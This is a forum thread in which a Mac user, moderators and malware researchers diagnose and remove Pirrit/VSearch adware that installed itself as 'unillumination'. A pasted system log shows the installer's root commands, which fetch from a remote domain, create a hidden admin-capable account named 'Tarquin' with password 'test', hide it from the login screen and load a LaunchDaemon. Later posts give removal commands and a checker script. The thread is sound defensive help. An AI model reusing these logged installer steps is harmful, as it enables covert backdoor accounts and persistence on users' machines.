
Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Hi All,

This new process appeared 1 week ago when I was away on vacation using a mobile USB device to connect. That device has been just fine for 6 years, and only ever used a couple of times a year (in the same place) when I find myself in the boondocks. No neighbours there, and no WiFi anywhere around.

Old MBP with Mavericks.

LittleSnitch started kicking off asking for permissions to connect to sites with addresses consisting of all kinds of long strings of rubbish. Being paranoid I said no. Then, as it was getting insistent, I completely blocked the process, and all ok since then - even back home on a good connection.

However, what's really spooky is I can find not 1 reference to this process searching on Google, and now Adobe Lightroom (properly licensed and working) is stalling and not performing at all.

If it's a kosher process, why on earth are there zero references to it on Google ?

It's also a process that re-spawns the moment it's closed in Activity Monitor. I've added a screenshot below in case it helps - and I am *not* Tarquin.

Anybody have a clue?

unillumination.jpg
Many TIA.

 

Weaselboy

Moderator
Staff member
Jan 23, 2005
34,349
16,006
California
http://tarquin.sourceforge.net/index.php

Hmm... odd. I have never heard of that process either. Does this Tarquin app link ring any bells for you maybe?

Select the process in Activity Monitor then hit command-i to get info on the process. Then look in the open files and ports and see what files it is using. That should give you some clue where this is coming from.

If that does not solve it for you, run the app Etrecheck to create an anonymized report of everything running and the related launch locations. You can post that report here for us to take a look.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Hi Weaselboy.
I did find the Tarquin software link, but it's some specialist medical software, so way out of my area. Also, this just appeared 1 week ago when I was on a very slow connection (and I mean slower than dial-up) - happily.

I'll take a look at Etrecheck, and meanwhile here's a view on what other processes are flagged to user 'Tarquin' in case any of it makes sense.

Thanks!

Tarquin.jpg

p.s. Here is a copy of the Library contents for it in case it rings any bells.

I am far from being a coder, so maybe the contents might mean something to you or others ?

Unillumination-Library.jpg
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Thanks. That looks like a file-sharing App.
What I am certain of is that I didn't install anything at all that day/night, as my connection speed is that slow I wouldn't even attempt it.

I blocked all incoming & outgoing traffic from that process in Little Snitch as soon as it started requesting all sorts of connections including the URL mentioned below; so it can't communicate now.

I have checked the system log, and below is a paste of what happened at that time. The zero install injector has basically installed this stuff by calling it from a URL. More info at: http://www.ubuntugeek.com/zero-inst...tware-easily-and-without-root-privileges.html

Whatever it's up to, it certainly doesn't look healthy to me. Also, I am denied access to the folder /var/Tarquin despite being an Administrator.

Am tempted to delete all records in Library, and any other reference I can find. However, will hang on a bit in case you/anyone else would like more info'.

Do the log entries help ?


31/03/2016 00:36:16.629 sudo[18352]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 777 /var/tmp/DemoInjector07122015/install_Injector.sh
31/03/2016 00:36:16.646 sudo[18354]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/var/tmp/DemoInjector07122015/install_Injector.sh A2016 id http://aa8780bb28a1de4eb5bff33c28a218a930.com
31/03/2016 00:36:17.734 sudo[18376]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist name unillumination
31/03/2016 00:36:17.798 sudo[18378]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist pref com.unillumination.preferences.plist
31/03/2016 00:36:17.801 com.apple.WebKit.Networking[285]: CFNetwork SSLHandshake failed (-9806)
31/03/2016 00:36:17.843 sudo[18380]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist net_pref com.unillumination.net-preferences.plist
31/03/2016 00:36:17.869 sudo[18382]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp -r /var/tmp/DemoInjector07122015/DemoInjector.app /var/tmp/DemoInjector07122015/unillumination
31/03/2016 00:36:17.958 sudo[18384]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp -r /var/tmp/DemoInjector07122015/unillumination /Library
31/03/2016 00:36:18.445 sudo[18387]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/rm -r /var/tmp/DemoInjector07122015/unillumination
31/03/2016 00:36:19.039 sudo[18389]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp /var/tmp/DemoInjector07122015/change_net_settings.sh /etc
31/03/2016 00:36:19.054 sudo[18391]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/chown root /etc/change_net_settings.sh
31/03/2016 00:36:19.310 sudo[18396]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 755 /etc/change_net_settings.sh
31/03/2016 00:36:19.332 sudo[18399]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod -R 755 /Library/unillumination
31/03/2016 00:36:19.374 sudo[18402]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mv /Library/unillumination/Contents/MacOS/DemoInjector /Library/unillumination/Contents/MacOS/unillumination
31/03/2016 00:36:20.280 sudo[18420]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.common.plist user_id Tarquin
31/03/2016 00:36:20.351 sudo[18422]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin UniqueID 401
31/03/2016 00:36:21.628 sudo[18435]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin PrimaryGroupID 20
31/03/2016 00:36:21.688 sudo[18437]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin NFSHomeDirectory /var/Tarquin
31/03/2016 00:36:21.777 sudo[18439]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin UserShell /bin/bash
31/03/2016 00:36:21.780 com.apple.launchd[1]: System: ��&P�[18440] disappeared out from under us (UID: 0 EUID: 0)
31/03/2016 00:36:21.858 sudo[18446]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -create /Users/Tarquin RealName User Tarquin
31/03/2016 00:36:21.921 sudo[18448]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/dscl . -passwd /Users/Tarquin test
31/03/2016 00:36:22.648 sudo[18451]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/mkdir /var/Tarquin
31/03/2016 00:36:22.683 sudo[18453]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/chown -R Tarquin /var/Tarquin
31/03/2016 00:36:22.703 sudo[18455]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod a+rwx /Library/unillumination/Contents/MacOS/unillumination
31/03/2016 00:36:22.718 sudo[18457]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool YES
31/03/2016 00:36:22.844 sudo[18462]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp /var/tmp/DemoInjector07122015/com.pref.preferences.plist /Library/Preferences/com.unillumination.preferences.plist
31/03/2016 00:36:22.860 sudo[18464]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/sbin/chown root /Library/Preferences/com.unillumination.preferences.plist
31/03/2016 00:36:22.876 sudo[18466]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist dist_channel_id A2016
31/03/2016 00:36:22.899 sudo[18468]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist machine_id 7C07CE52-8F62-5C83-B9A1-A4479EF65628
31/03/2016 00:36:22.922 sudo[18470]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist click_id id
31/03/2016 00:36:22.945 sudo[18472]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults write /Library/Preferences/com.unillumination.preferences.plist domain http://aa8780bb28a1de4eb5bff33c28a218a930.com
31/03/2016 00:36:22.968 sudo[18474]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/plutil -convert xml1 /Library/Preferences/com.unillumination.preferences.plist
31/03/2016 00:36:23.847 sudo[18490]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/cp /var/tmp/DemoInjector07122015/com.pref.net-preferences.plist /Library/LaunchDaemons/com.unillumination.net-preferences.plist
31/03/2016 00:36:23.862 sudo[18492]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 755 /Library/LaunchDaemons/com.unillumination.net-preferences.plist
31/03/2016 00:36:23.874 sudo[18494]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/launchctl load -w /Library/LaunchDaemons/com.unillumination.net-preferences.plist
31/03/2016 00:36:23.956 sudo[18498]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults read /Library/Preferences/com.common.plist name
31/03/2016 00:36:23.977 sudo[18500]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/defaults read /Library/Preferences/com.common.plist user_id
31/03/2016 00:36:34.011 sudo[18563]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/sbin/pfctl -evf /etc/pf_proxy.conf
31/03/2016 00:36:34.038 sudo[18565]: root : TTY=unknown ; PWD=/ ; USER=Tarquin ; COMMAND=/Library/unillumination/Contents/MacOS/unillumination
31/03/2016 00:36:35.688 xpcd[18584]: Info.plist does not contain an XPCService dictionary: /System/Library/Frameworks/Security.framework/XPCServices/SecurityAgent.xpc
 

Weaselboy

Moderator
Staff member
Jan 23, 2005
34,349
16,006
California
This is pretty scary. I think you are right about what happened, but I can't see how it would be able to execute that install injector script without you providing an admin password. It looks like that install injector script pulled everything down from that web site a couple lines down. You can see the URL there. I found this info related to that URL. Not good.

The script even made a hidden user called Tarquin with the password "test". Look in your /Users folder and see if it is there. I suspect you can't see it. Read this. If you reboot that hidden user will not appear in the login screen and it won't appear in Users & Groups.

Run this command in Terminal (you will be asked for your password) and it should show the Tarquin user there.

Code:
sudo du -d 1 -x -c -g /Users

The whole thing is being launched by this line in /Library/LaunchDaemons/. If you go to that folder and delete the plist and reboot, it should kill it.

Code:
/Library/LaunchDaemons/com.unillumination.net-preferences.plist

Before you do that though, please try the get info from Activity Monitor like I suggested just to see what else it is running.

I have never ever seen anything like this. At this point, I think it is safe to say your machine is completely compromised and I would pull off your data and erase the entire disk and reinstall the OS, then manually reinstall your apps and move your data back manually.

Can you use something like CCC to make a clone of the entire disk and set it aside first? I think there are others who may be interested in looking further into this for you.

I'm going to ping a couple forum members here to ask them to throw an eye on this also.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Many thanks - and no, user Tarquin doesn't show up.

* please try the get info from Activity Monitor like I suggested just to see what else it is running.
Embarrassed to say I'm not sure how to do this. I can see the processes running under user Tarquin as posted earlier, but don't see anything else dodgy running.

LittleSnitch is doing a good job of keeping the animal caged. It's trying to connect to 2 websites at the same IP address;

1. thecloudservices.net
Which virus total flags 3 times for malware

2. http://cloudservices.targetingedge.netdna-cdn.com/
Which virus total reckons is clean.

Happily I caught this & blocked the connections while away on the mobile internet. However, where I was staying is on a national border, so the connection is very weak & slow, meaning that uploading anything meaningful would take forever.

A full reinstall now is a scary prospect, but I'll give that some thought, and perhaps start with deleting what I can find as you suggest.
What really puzzles me is how this got in. I'm naturally very cautious (hence LittleSnitch), and never crash around clicking everything in sight. All very odd.
 

Weaselboy

Moderator
Staff member
Jan 23, 2005
34,349
16,006
California
Many thanks - and no, user Tarquin doesn't show up.

Even with that Terminal command I gave you? Because you definitely have that user account on there and it has full access to your system.

This command in Terminal should show the account.

Code:
sudo dscl . list /Users

This command will delete the account.

Code:
sudo dscl . delete /Users/Tarquin

* please try the get info from Activity Monitor like I suggested just to see what else it is running.

Embarrassed to say I'm not sure how to do this. I can see the processes running under user Tarquin as posted earlier, but don't see anything else dodgy running.

No problem... here is what you do. Start Activity Monitor and select that unillumination process with your mouse like I did with CalendarAgent in my screenshot. Now click the i in the tool bar just above that. It will bring up a window like my bottom screenshot. Click to the Open Files and Ports tab of the window. That will show all files that the unillumination process is using.


Screen Shot 2016-04-06 at 8.11.16 AM.png
Screen_Shot_2016-04-06_at_8_08_47_AM.png
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
* Even with that Terminal command I gave you?
I confess I didn't try that, as cagey about entering my system password with something nasty lurking on the machine. That probably doesn't make sense, but that's how cautious I've been.

* Activity Monitor
Now I see the problem. I only have 2 tabs - Memory & Statistics; no 'Open Files And Ports' tab. I'm using v10.9.2, and haven't updated as it will disable some of my important software. Maybe that's why I don't have that tab?

Whatever, many thanks for the tips. You have given me enough to hopefully get rid of the user & the plist.

Will hang on though in case there's a work-around for my missing tab.
 

Weaselboy

Moderator
Staff member
Jan 23, 2005
34,349
16,006
California
* Activity Monitor
Now I see the problem. I only have 2 tabs - Memory & Statistics; no 'Open Files And Ports' tab.

No... that just means that process does not have any other files or ports open. Like this process for example.

Could anybody else have had access to your system to install this? I am still baffled how it got on there if you were doing nothing else at that time. Have you recently installed any new apps that may have carried this malware payload?

Screen Shot 2016-04-06 at 8.37.52 AM.png
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
I just checked myself, and for other process the tab is there - just not for those being run by Tarquin. Phew.

I am as baffled as you. The only other possibility I can think of is my GF used it for about 20 minutes earlier that day to check her gmail & read the news. She's a PC user though (with 0 knowledge of those) so managed to open a couple of apps in the process, but nothing out of the ordinary.
Nobody else could have had access, or my screen password, which sleeps & locks after 5 minutes.

The only thing I've installed this year (earlier in March) was a Samsung Printer Manager from their site, which was supposedly corrupted so I got rid of it immediately.
Otherwise, my mobile internet dongle is 6 years old, is only used a few times a year on journeys abroad, and has never been used by anyone else.

Very glad that I have LittleSnitch network monitor on, as otherwise I wouldn't have known what was going on, and that process would still be happily communicating with whatever sites it wanted to. And given that it seems to include a file-sharing app, that could have been *bad* !

Am I clear to trash this thing? Or can you think of any other places to check for related nasties ?
 

Weaselboy

Moderator
Staff member
Jan 23, 2005
34,349
16,006
California
Am I clear to trash this thing? Or can you think of any other places to check for related nasties ?

Before you ditch it, and while it is still running. Run Etrecheck like I mentioned. That will show all launch and startup items to make sure there is nothing anywhere else besides that /Library/LaunchDaemons/ plist we already know about.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Done - and I like this little App. Fast, and very useful.
It has flagged this as Adware, and found another that I wasn't sure about so was already blocking in LittleSnitch

Adware:

/Library/LaunchDaemons/com.edgeshotUpd.plist

/Library/LaunchDaemons/com.unillumination.net-preferences.plist

2 adware files found. [Remove]

And it also flagged up the 2 Launch Daemons.

I shall use Etrecheck to remove them both, and then delete their folders in Library. Might also add the 2 sites it was trying to connect to to Hosts as an extra precaution. Then reboot & hold my breath.

Many thanks indeed for all your support - invaluable. Will let you know if it looks like it was successful.
 

KALLT

macrumors 603
Sep 23, 2008
5,376
3,411
A quick web search of ‘DemoInjector’ turned up this recent blog post at Objective-See. It seems to be very similar to a strain of malware identified as OSX.Pirrit. They even offer a shell script at the end to remove it, although I cannot say whether it is applicable to you.

https://objective-see.com/blog/blog_0x0E.html

-- Edit: @Kitu

Based on what you posted above as well as the shell script, you should probably proceed as follows.
  1. Check out: /Library/Preferences/com.common.plist (with Quick Look)
    If it only contains entries relating to ‘unillumination’, then remove the file completely (it is not present on my Mavericks installation, so it may have been created by it).

  2. Remove:
    Code:
    sudo rm -rf /Library/unillumination
    sudo defaults delete /Library/Preferences/com.unillumination.preferences.plist
    sudo rm /etc/change_net_settings.sh
    sudo rm -rf /var/tmp/DemoInjector07122015
    sudo rm -rf /var/Tarquin
  3. Unload the launch daemon with:
    Code:
    sudo launchctl unload -w /Library/LaunchDaemons/com.unillumination.net-preferences.plist
    sudo killall unillumination
    sudo rm /Library/LaunchDaemons/com.unillumination.net-preferences.plist

  4. Remove the user Tarquin with the program Directory Utility (located at /System/Library/CoreServices). Make sure you authenticate yourself (lock in the top-right) then go to “Viewing: Users” and remove the user Tarquin completely. Alternatively, use the command posted by Weaselboy above.

  5. Restore the packet filter:
    Code:
    sudo pfctl -evf /etc/pf.conf
 
Last edited:
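After running the steps above, the question that remains is whether anything was missed: a path that was not removed, or the hidden account Weaselboy described (UID below 500, invisible in the login window and in Users & Groups once Hide500Users is set). The following is an added example, not code from this thread, from Objective-See or from Etrecheck, that checks both. The artifact list is drawn from the log excerpt and KALLT's steps; on another machine the `unillumination` and `Tarquin` names will differ, since 0xAmit notes below that the installer generates them per infection, so the list is a parameter. The `dscl . -list /Users UniqueID` listing is a constructed sample in the two-column shape that command prints, and the `demo_tree` helper stands in for a partially cleaned disk so the script runs offline.

```python
import os
import tempfile

# Artifact paths named in this thread (the sudo log excerpt and KALLT's
# removal steps). On another machine the "unillumination" / "Tarquin" names
# will differ, because the installer generates them per infection.
PIRRIT_ARTIFACTS = [
    "/Library/unillumination",
    "/Library/Preferences/com.unillumination.preferences.plist",
    "/Library/LaunchDaemons/com.unillumination.net-preferences.plist",
    "/etc/change_net_settings.sh",
    "/etc/pf_proxy.conf",
    "/var/tmp/DemoInjector07122015",
    "/var/Tarquin",
]

# Constructed listing in the two-column shape printed by
# `dscl . -list /Users UniqueID` (account name, then UID).
DSCL_SAMPLE = """\
_spotlight     89
_windowserver  88
daemon          1
nobody         -2
root            0
Tarquin       401
kitu          501
"""

SYSTEM_ACCOUNTS = {"root", "daemon", "nobody"}


def remaining_artifacts(root, artifacts=PIRRIT_ARTIFACTS):
    """Return the artifacts that still exist, each resolved beneath `root`.
    Use root="/" on the affected Mac; the demo below uses a temporary tree."""
    return [p for p in artifacts if os.path.lexists(os.path.join(root, p.lstrip("/")))]


def hidden_accounts(dscl_listing, threshold=500):
    """Accounts with a UID below `threshold` that are neither Apple's
    underscore-prefixed service accounts nor root/daemon/nobody. With
    Hide500Users set, such an account is absent from the login window and
    from Users & Groups, which is how the Tarquin account stayed out of sight."""
    found = []
    for line in dscl_listing.splitlines():
        parts = line.split()
        if len(parts) != 2 or not parts[1].lstrip("-").isdigit():
            continue
        name, uid = parts[0], int(parts[1])
        if uid < threshold and not name.startswith("_") and name not in SYSTEM_ACCOUNTS:
            found.append(name)
    return found


def demo_tree():
    """Build a throwaway directory that still carries two of the artifacts,
    standing in for a partially cleaned system."""
    root = tempfile.mkdtemp(prefix="pirrit-check-")
    leftovers = (
        "/Library/LaunchDaemons/com.unillumination.net-preferences.plist",
        "/var/Tarquin/.bash_history",
    )
    for p in leftovers:
        full = os.path.join(root, p.lstrip("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    return root


if __name__ == "__main__":
    root = demo_tree()
    print("still present:", remaining_artifacts(root))
    print("hidden accounts:", hidden_accounts(DSCL_SAMPLE))
```

On a real machine, feed `hidden_accounts` the output of `sudo dscl . -list /Users UniqueID` and call `remaining_artifacts("/")`; an empty result from both, after a reboot, is the condition for calling the cleanup finished.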

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Thanks Kallt.

Think I've got it knocked on the head now though.

I used Etrecheck to remove what it said was Adware, deleted the dodgy User using terminal, and then deleted everything related in the Library.

Ran the sudo daily weekly monthly maintenance, and then rebooted. No sign of the process/user anywhere.

Hope that's the end of it, and maybe this thread might help others with the same/similar problems. It's pretty scary to find something going on, but not find *any* reference at all to it on Google.

Cheers again Weaselboy!
 

KALLT

macrumors 603
Sep 23, 2008
5,376
3,411
Hope that's the end of it, and maybe this thread might help others with the same/similar problems. It's pretty scary to find something going on, but not find *any* reference at all to it on Google.

Probably because it is actually novel. That blog post I linked was literally posted yesterday and the author was notified of this malware last Wednesday. You seem to be one of the earlier victims. Hopefully more will be discovered soon. It is interesting to note that System Integrity Protection would likely not have prevented this, at least not when I see what was affected.
 

Weaselboy

Moderator
Staff member
Jan 23, 2005
34,349
16,006
California
A quick web search of ‘DemoInjector’ turned up this recent blog post at Objective-See. It seems to be very similar to a strain of malware identified as OSX.Pirrit.

It does look like the same install method. Odd though that MalWareBytes is aware of unillumination and a Google search turns up nothing... at least for me. It looks very new.

Edit: I see you Ninja posted on me. :)
Think I've got it knocked on the head now though.

You should still run all the commands listed by KALLT to complete the cleanup. Some of what he posted I don't think the MalWareBytes scan done as part of Etrecheck will clean up. You can trust him. He is the other forum member I mentioned I was going to ask to take a look at this.
 

thomasareed

macrumors member
Aug 24, 2015
91
91
It's also a process that re-spawns the moment it's closed in Activity Monitor. I've added a screenshot below in case it helps - and I am *not* Tarquin.

That is a variant of VSearch, aka Pirrit, and I see KALLT already pointed out the excellent Objective-See article on this adware.

Fortunately, nasty as it is, it's just adware. It could have been worse, but as it is, once you've removed all the components, you should be fine.

Malwarebytes Anti-Malware for Mac should remove some, if not all, of the components, though I haven't yet run this new variant through its paces and determined whether we need to add anything new to our signatures. If you want to give that a try, you can download it here:

https://malwarebytes.org/antimalware/mac/

It's free, so no need to purchase anything.

I've got a lead on an installer for this variant that I will be playing with shortly, and will update here with the results.

Thomas Reed
Director of Mac Offerings, Malwarebytes
 

0xAmit

macrumors newbie
Apr 6, 2016
3
5
Israel
Hey everyone!
Amit Serper here, I'm the researcher who wrote the article on Objective-see about Pirrit :)

That post is actually from today and not from yesterday, Patrick Wardle, who owns objective-see.com is in Hawaii, there's a huge time difference. It was posted this morning (where I am, GMT+2) but it was still yesterday's night in Hawaii :) So it's a pretty fresh post.

First, I have to say that it's really interesting reading this entire thread.
The sample that I researched was given to me by a guy who was hit and had a very similar story to yours. I am just really curious here - can you track how you were infected? The guy who gave me the sample didn't know how he was infected and I had to trace steps and rebuild the malware installer myself. Do you recall installing a flash update or something that's called vInstaller? I'd love to get your input on that either here or on Twitter.com/0xAmit


As for removal instructions - my removal script (linked in the article) should remove the threat. The reason you weren't finding any results in Google about that string you were looking for is because it was generated on your machine; each infection has a different user and program name. That's actually what made me curious enough to look into it.
That is a variant of VSearch, aka Pirrit, and I see KALLT already pointed out the excellent Objective-See article on this adware.

Fortunately, nasty as it is, it's just adware. It could have been worse, but as it is, once you've removed all the components, you should be fine.

Malwarebytes Anti-Malware for Mac should remove some, if not all, of the components, though I haven't yet run this new variant through its paces and determined whether we need to add anything new to our signatures. If you want to give that a try, you can download it here:

https://malwarebytes.org/antimalware/mac/

It's free, so no need to purchase anything.

I've got a lead on an installer for this variant that I will be playing with shortly, and will update here with the results.

Thomas Reed
Director of Mac Offerings, Malwarebytes
I'd love to get that installer if you want to share :)
 

thomasareed

macrumors member
Aug 24, 2015
91
91
I'd love to get that installer if you want to share :)

Good to meet you, Amit!

I'd be glad to share my sample, although it looks like it's an older variant that doesn't create the hidden user or any of those other interesting things. I'll send you a PM.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Just when you think you've nailed it.... :/

Kallt, thanks for posting the code - and Amit for your article/advice. Now, where to start ?

I have another one that Etrecheck found - 'edgeshotUpd'. I thought I'd got that one back in December. It came posing as MacKeeper, and I immediately realised it was dodgy, so did what I could to get rid of it. No new user name though.

I'm posting a screenshot of the com.common.plist as it includes entries for both of these mongrels.

While looking for more traces of that, I also noticed a folder modified at exactly the time this started, and a sub-folder created at exactly the same time. It's at /var/folders/ per the below snapshot, and the subfolder 'x9' was also created at the same time - 31/3/2016 00:36.

I can't get in there though, as I'm told I have no permissions, despite being setup as Admin.

Is this something you found during your testing? And should it be deleted ?
And the attachments of course. BTW, just realised the edgeshotUpd file has my machine ID, so maybe not a good idea to u/load that one.

com.common.plist.jpg

And the related folders under /var/

Folders.jpg
 

0xAmit

macrumors newbie
Apr 6, 2016
3
5
Israel
Just when you think you've nailed it.... :/

Kallt, thanks for posting the code - and Amit for your article/advice. Now, where to start ?

I have another one that Etrecheck found - 'edgeshotUpd'. I thought I'd got that one back in December. It came posing as MacKeeper, and I immediately realised it was dodgy, so did what I could to get rid of it. No new user name though.

I'm posting a screenshot of the com.common.plist as it includes entries for both of these mongrels.

While looking for more traces of that, I also noticed a folder modified at exactly the time this started, and a sub-folder created at exactly the same time. It's at /var/folders/ per the below snapshot, and the subfolder 'x9' was also created at the same time - 31/3/2016 00:36.

I can't get in there though, as I'm told I have no permissions, despite being setup as Admin.

Is this something you found during your testing? And should it be deleted ?
And the attachments of course. BTW, just realised the edgeshotUpd file has my machine ID, so maybe not a good idea to u/load that one.

And the related folders under /var/

Whatever ends with Upd is a variant of Pirrit (it's also in my research paper). Again, running my script as root should fix your problem. I found some more variants and checked their installation script against my removal script, shouldn't be an issue there. Can you look in /var/tmp and see what's the date that's written next to the word DemoInjector on that folder? Also, please look at your download folder, did you download any cracks or something like that lately? Try to think about what you installed before you were infected.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Amit, I have run all the Terminal commands already, but shall give your script a go tomorrow. Thanks.

Sorry, but I already removed the DemoInjector. However, I pasted some of the system log above (5th post down), and that tells me;

31/03/2016 00:36:16.629 sudo[18352]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 777 /var/tmp/DemoInjector07122015/install_Injector.sh
31/03/2016 00:36:16.646 sudo[18354]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/var/tmp/DemoInjector07122015/install_Injector.sh A2016 id http://aa8780bb28a1de4eb5bff33c28a218a930.com

I am an extremely boring user, so no cracks - and no downloads recently. I have racked my brain on this one, but my connection speed at the time was so slow (think early '90s dial-up) that I wouldn't even have attempted it.
And that was the case from 24/3 to 31/3 when it happened. On 23/3 I was at a hotel with unsecured WiFi access, but even there I did nothing out of the ordinary, and certainly no downloads/installations.
I am baffled, but will keep thinking and come back to you.

Meanwhile, any thoughts on the /var/folders/x9/ screenshot pasted above ? That was created at the very same time as it all kicked off.
 

Kitu

macrumors newbie
Original poster
Apr 5, 2016
12
2
Ok, radio silence has ensued.

Weaselboy, I wonder if you can help me with the last unanswered question, being:

"Meanwhile, any thoughts on the /var/folders/x9/ screenshot pasted above ? That was created at the very same time as it all kicked off."

From what I've found searching, these are basically cache files. Some advice says it's ok to delete folders at this level, but other advice says 'don't mess with them'.

Seeing as this folder & contents were created when the adware was installed & started trying to communicate with the outside world - to the second - I can't see that nuking them would do any harm, but would feel a lot more comfortable to get other opinions here.

Thoughts ?

K.


Amit, I have run all the Terminal commands already, but shall give your script a go tomorrow. Thanks.

Sorry, but I already removed the DemoInjector. However, I pasted some of the system log above (5th post down), and that tells me;

31/03/2016 00:36:16.629 sudo[18352]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/chmod 777 /var/tmp/DemoInjector07122015/install_Injector.sh
31/03/2016 00:36:16.646 sudo[18354]: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/var/tmp/DemoInjector07122015/install_Injector.sh A2016 id http://aa8780bb28a1de4eb5bff33c28a218a930.com

I am an extremely boring user, so no cracks - and no downloads recently. I have racked my brain on this one, but my connection speed at the time was so slow (think early '90s dial-up) that I wouldn't even have attempted it.
And that was the case from 24/3 to 31/3 when it happened. On 23/3 I was at a hotel with unsecured WiFi access, but even there I did nothing out of the ordinary, and certainly no downloads/installations.
I am baffled, but will keep thinking and come back to you.

Meanwhile, any thoughts on the /var/folders/x9/ screenshot pasted above ? That was created at the very same time as it all kicked off.
 